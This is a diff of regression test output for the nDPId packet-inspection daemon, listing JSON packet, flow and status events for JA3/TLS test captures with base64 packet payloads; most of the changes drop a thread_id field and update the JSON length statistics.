01276{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":734,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":734,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAAsjoBkAAPQZ4ggrOQfkKzoMSAbvlIcEFt7XOLtklUBgAf3btAAArP3r0rVe0Aym6JLwpOw\/ARwhTpY9aS7jceyqxacIXzRspfll0u1\/NkXDZNHalNI0jifA02VmOaSzhsGzJ03fuqKyyLCUPurWOZCj\/m+yOkMFwArOo4uIOxsENzfQIgKhMCW3YH1KAEc\/D52lgcc5dEHoPQCigIQjo2dWhtfY\/oG4sKNF1rHdnRmXJwxczAAECAQCB0DPstOMfM5F8X5MwgsDlsx2xgwVyLIjRqp9YCi1KiPDkTsRRNZ9DD6t\/ryiWXZAQh9BkHB6TFnEabzzd3ZV133DGDkbN8ivrZ\/z57itpt2v72s73UcOj834+OvBHQFis\/1RjFZ7mfCgZRE7PIBkRRL\/Gn9PLQP0KlGyVBXaYBJTPMozKF3QO3V\/4LEH3gpTFO8WY5zmgwf\/CrWjV7llloR3tiNBaPGJTsW2xi2J6BP1sZieM89wnWuVbN6GqAOFNenvYif3wSlXllxAZenbfAoFQylIORWBw38yjKf3qIiHxBJU4ZxexUo\/O3\/t3hKHDSjcp4a7NNUxFPMsCxeC4AgEBAC3kckI79wHr9Jdk4qPrAuTCIIeE\/qBxvLET0Ua\/Ah37Jo0oIdRWbuCV7ge6meATSbHe7FqMhYpMG23Q4uSTupEwX5lZxUqx\/xIwzx\/AfDOL16722QUiKA21ChDMHjmqP5t7YWazRTsOuyLB6n0u9314zm7LNLRLxx5EGml4HiX5zxmVQR\/KEVEeOD+pMCY0IxlT35RaHC0aLunpBP\/ttxpaC85IzJ+shFeD9zYmMngnHXqhjgcuDFtGQMpQpLUFpMeo2O0rVIMdLlN1ZFuVyYVT661Vjz7ZgC7FvbaJEi5940Vlycu+kXQRVfxPb6IwVbYoX8euxN9GS2WsUJxqmpEWAwMABA4AAAA="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":8,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846910} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":8,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846910}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACjDTEAAPwad3ArOgxIKzkH55SEBu84u2SXBBbIBUBAfXrSWAAAAAAAAAAA="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACjDTEAAPwad3ArOgxIKzkH55SEBu84u2SXBBbIBUBAfXrSWAAAAAAAAAAA="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":9,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846937} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":9,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846937}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAACjoB0AAPQZ7IQrOQfkKzoMSAbvlIcEFulXOLtksUBAAf8saAAAAAAAAAAA="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAACjoB0AAPQZ7IQrOQfkKzoMSAbvlIcEFulXOLtksUBAAf8saAAAAAAAAAAA="}
00217{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846938} 00203{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846938}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACifbEAAPwbBvArOgxIKzkH55SEBu84u2SwAAAAAUAQAAEcBAAAAAAAAAAA="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACifbEAAPwbBvArOgxIKzkH55SEBu84u2SwAAAAAUAQAAEcBAAAAAAAAAAA="}
00217{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846965} 00203{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846965}
00488{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":25,"global_ts_msec":1557818846965} 00488{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":25,"global_ts_msec":1557818846965}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 11/0 ~~ packets captured/processed: 11/0
@@ -35,6 +35,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 221 chars ~~ json string min len.......: 207 chars
~~ json string max len.......: 2342 chars ~~ json string max len.......: 2328 chars
~~ json string avg len.......: 1280 chars ~~ json string avg len.......: 1266 chars

58
test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out
View File

@@ -1,36 +1,36 @@
00483{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00483{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00490{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1505724520744} 00490{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1505724520744}
00451{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} 00437{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"}
00269{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1505724520744} 00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1505724520744}
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505724520744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1505724520744,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505724520744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1505724520744,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"}
00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505724520947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1505724520947,"pkt":"MNF+EIYg\/Ejv6KgaCABFAABgHZ4AAD0Rln6XebkshL70DAhoCGgATAAAMP8APEGxP1xFAAA8AABAADIGm0iXecGgwKiTsQG75IBV2gFiQsba5qAScSDmyQAAAgQFeAQCCAoxbvx\/AAu5rwEDAwc="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505724520947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1505724520947,"pkt":"MNF+EIYg\/Ejv6KgaCABFAABgHZ4AAD0Rln6XebkshL70DAhoCGgATAAAMP8APEGxP1xFAAA8AABAADIGm0iXecGgwKiTsQG75IBV2gFiQsba5qAScSDmyQAAAgQFeAQCCAoxbvx\/AAu5rwEDAwc="}
00455{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724520947,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="} 00441{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724520947,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="}
00269{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724521281} 00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724521281}
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505724521281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1505724521281,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505724521281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1505724521281,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="}
01001{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":513,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":513,"pkt_l4_len":0,"thread_ts_msec":1505724521281,"pkt":"\/Ejvopo\/MNF+D2w+CABFuAHzPsUAAEARcAyEvvQMl3m5LAhoCGgB3wAAMv8BzwE8W3RzUAAARQABy2NMQABABihtwKiTsZd5waDkgAG7Qsba5lXaAWOAGAHJpLIAAAEBCAoAC7oOMW78fxYDAQGSAQABjgMDWb+IaLIesQWIv6YFz4XWzGx5xL0th24F2at6CJidHk8AAQbALMAwAJ\/ArcCfwCTAKABrwArAFAA5wK\/Ao8CHwIvAfcBzwHcAxACIwCvALwCewKzAnsAjwCcAZ8AJwBMAM8CuwKLAhsCKwHzAcsB2AL4ARcAIwBIAFgCrwKfAOACzwDYAkcCRwJvAl8CrAKrApsA3ALLANQCQwJDAlsCawKrANACPAJ3AnQA9ADXAMsAqwA\/ALsAmwAXAocB7AMAAhMCNwHnAicB1AJzAnAA8AC\/AMcApwA7ALcAlwATAoMB6ALoAQcCMwHjAiMB0AArADcADAK0AtwCVwJPAmQCsALYAlMCSwJgAkwCpwKUArwCNwI\/AlcCpAKjApACuAIzAjsCUwKgAiwD\/AQAAXwAAABMAEQAADjE5Mi42OS4xMzYuMTc5AA0AFgAUBgMGAQUDBQEEAwQBAwMDAQIDAgEACgAYABYAGQAcABgAGwAXABYAGgAVABQAEwASAAsAAgEAABYAAAAXAAAAIwAA"} 00987{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":513,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":513,"pkt_l4_len":0,"thread_ts_msec":1505724521281,"pkt":"\/Ejvopo\/MNF+D2w+CABFuAHzPsUAAEARcAyEvvQMl3m5LAhoCGgB3wAAMv8BzwE8W3RzUAAARQABy2NMQABABihtwKiTsZd5waDkgAG7Qsba5lXaAWOAGAHJpLIAAAEBCAoAC7oOMW78fxYDAQGSAQABjgMDWb+IaLIesQWIv6YFz4XWzGx5xL0th24F2at6CJidHk8AAQbALMAwAJ\/ArcCfwCTAKABrwArAFAA5wK\/Ao8CHwIvAfcBzwHcAxACIwCvALwCewKzAnsAjwCcAZ8AJwBMAM8CuwKLAhsCKwHzAcsB2AL4ARcAIwBIAFgCrwKfAOACzwDYAkcCRwJvAl8CrAKrApsA3ALLANQCQwJDAlsCawKrANACPAJ3AnQA9ADXAMsAqwA\/ALsAmwAXAocB7AMAAhMCNwHnAicB1AJzAnAA8AC\/AMcApwA7ALcAlwATAoMB6ALoAQcCMwHjAiMB0AArADcADAK0AtwCVwJPAmQCsALYAlMCSwJgAkwCpwKUArwCNwI\/AlcCpAKjApACuAIzAjsCUwKgAiwD\/AQAAXwAAABMAEQAADjE5Mi42OS4xMzYuMTc5AA0AFgAUBgMGAQUDBQEEAwQBAwMDAQIDAgEACgAYABYAGQAcABgAGwAXABYAGgAVABQAEwASAAsAAgEAABYAAAAXAAAAIwAA"}
00269{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":4,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":513,"expected":517,"global_ts_msec":1505724521624} 00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":4,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":513,"expected":517,"global_ts_msec":1505724521624}
00456{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724522900,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABccWEAAEARPweEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3R4UAAARQAANGNNQABABioDwKiTsZd5waDkgAG7QsbcfVXaBs+AEAIjeMYAAAEBCAoAC7rNMW7\/7w=="} 00442{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724522900,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABccWEAAEARPweEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3R4UAAARQAANGNNQABABioDwKiTsZd5waDkgAG7QsbcfVXaBs+AEAIjeMYAAAEBCAoAC7rNMW7\/7w=="}
00269{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":9,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724523243} 00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":9,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724523243}
00457{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724523243,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcdugAAEAROYCEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3R5UAAARQAANGNOQABABioCwKiTsZd5waDkgAG7QsbcfVXaB5OAEAIjeAIAAAEBCAoAC7rNMW7\/7w=="} 00443{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724523243,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcdugAAEAROYCEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3R5UAAARQAANGNOQABABioCwKiTsZd5waDkgAG7QsbcfVXaB5OAEAIjeAIAAAEBCAoAC7rNMW7\/7w=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":10,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724523425} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":10,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724523425}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1505724523425,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABogi4AAEARLi6EvvQMl3m5LAhoCGgAVAAAMv8ARAE8W3R6UAAARQAAQGNPQABABin1wKiTsZd5waDkgAG7QsbcfVXaB5OwEAIjg6MAAAEBCAoAC7rNMW8EIAEBBQpV2gbPVdoHkw=="} 